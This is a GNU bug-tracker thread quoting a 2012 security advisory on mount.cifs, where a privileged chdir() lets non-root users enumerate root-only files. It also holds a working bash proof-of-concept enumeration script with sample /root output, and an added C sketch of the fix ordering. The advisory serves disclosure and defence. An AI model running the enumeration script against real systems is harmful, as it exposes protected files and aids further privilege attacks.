emacs-bug-tracker

[debbugs-tracker] bug#10965: closed (mount.cifs vulnerability)


From: GNU bug Tracking System
Subject: [debbugs-tracker] bug#10965: closed (mount.cifs vulnerability)
Date: Wed, 07 Mar 2012 18:48:02 +0000

Your message dated Wed, 07 Mar 2012 11:45:54 -0700
with message-id <address@hidden>
and subject line Re: bug#10965: mount.cifs vulnerability
has caused the debbugs.gnu.org bug report #10965,
regarding mount.cifs vulnerability
to be marked as done.

(If you believe you have received this mail in error, please contact
address@hidden)


-- 
10965: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=10965
GNU Bug Tracking System
Contact address@hidden with problems
--- Begin Message ---
Subject: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 19:33:49 +0100
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0) Gecko/20111108 Thunderbird/8.0

Hello, here is a bug report for mount.cifs:
it is a little security breach on Linux permissions by controlling a privileged chdir().

regards.



########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################

1. VULNERABILITY
-------------------------
Linux arbitrary privileged chdir();
this leads to arbitrary file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the Linux base system, and is setuid on
most distributions.

This software mounts CIFS partitions on directories authorized by fstab.


3. DESCRIPTION
-------------------------
Although there are no authorized CIFS mounts, it is possible through the second
parameter to control a privileged chdir() syscall and infer the return value
through the responses.

This implies a little security breach on Linux permissions. A non-root user
can enumerate files and directories as root.

This can help to exploit other vulnerabilities, and to enumerate /root/ contents,
descriptors used by any process, user homes, etc.

One of the attack vectors is a /root/ directory scan:

address@hidden advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

It also allows enumerating sub-subdirectories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by address@hidden
# discover root protected files & directories, user homes, process descriptors, ...

path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
Confidentiality can be breached.

This method of transferring files is highly dangerous and can rely on a remote control of the server.

6. SYSTEMS AFFECTED
-------------------------
All versions are affected.

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV

10. DISCLOSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



--
Jesus Olmos
address@hidden

Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900




--- End Message ---
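
The ordering issue named in section 7 of the report above, as an added C illustration that is not mount.cifs source and not part of the original message. The function names, the user_mounts list (a stand-in for the fstab check) and the sample paths are all constructed for this example; it shows how the errno of a chdir() performed before authorization distinguishes files, directories and missing entries, and how authorizing first returns one answer for all of them.

```c
/* Added illustration, not mount.cifs source; every name here is hypothetical. */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
/* Constructed stand-in for the mount points fstab lets a user mount. */
static const char *const user_mounts[] = { "/mnt/share", NULL };

static int is_authorized(const char *mountpoint)
{
    for (size_t i = 0; user_mounts[i] != NULL; i++)
        if (strcmp(mountpoint, user_mounts[i]) == 0)
            return 1;
    return 0;
}

/* chdir() into mountpoint, then return to the old cwd; yields 0 or errno. */
static int try_chdir(const char *mountpoint)
{
    char old[4096];
    if (getcwd(old, sizeof old) == NULL || chdir(mountpoint) != 0)
        return errno;
    return chdir(old) != 0 ? errno : 0;
}

/* Reported ordering: chdir() first, so its errno reaches an unauthorized caller. */
int check_chdir_first(const char *mountpoint)
{
    int rc = try_chdir(mountpoint);
    if (rc != 0)
        return rc;            /* ENOENT, ENOTDIR or EACCES: one per path state */
    return is_authorized(mountpoint) ? 0 : EPERM;
}

/* Ordering from section 7: authorization first, one answer for every path. */
int check_authorize_first(const char *mountpoint)
{
    if (!is_authorized(mountpoint))
        return EPERM;         /* the filesystem is never consulted */
    return try_chdir(mountpoint);
}

int main(void)
{
    const char *paths[] = { "/dev/null", "/no-such-entry-example", "/" };
    for (size_t i = 0; i < 3; i++)
        printf("%s: chdir-first=%d authorize-first=%d\n", paths[i],
               check_chdir_first(paths[i]), check_authorize_first(paths[i]));
}
```

In a setuid binary the same effect can also be had by performing the chdir() with the caller's real credentials, which is a design alternative and not something the report proposes.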
--- Begin Message ---
Subject: Re: bug#10965: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 11:45:54 -0700
User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20120216 Thunderbird/10.0.1

tag 10965 notabug
thanks

On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs:
> it is a little security breach on Linux permissions by controlling a
> privileged chdir().

Thanks for the report, but you have sent it to the wrong list.  GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything.  I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.

-- 
Eric Blake   address@hidden    +1-919-301-3266
Libvirt virtualization library http://libvirt.org


--- End Message ---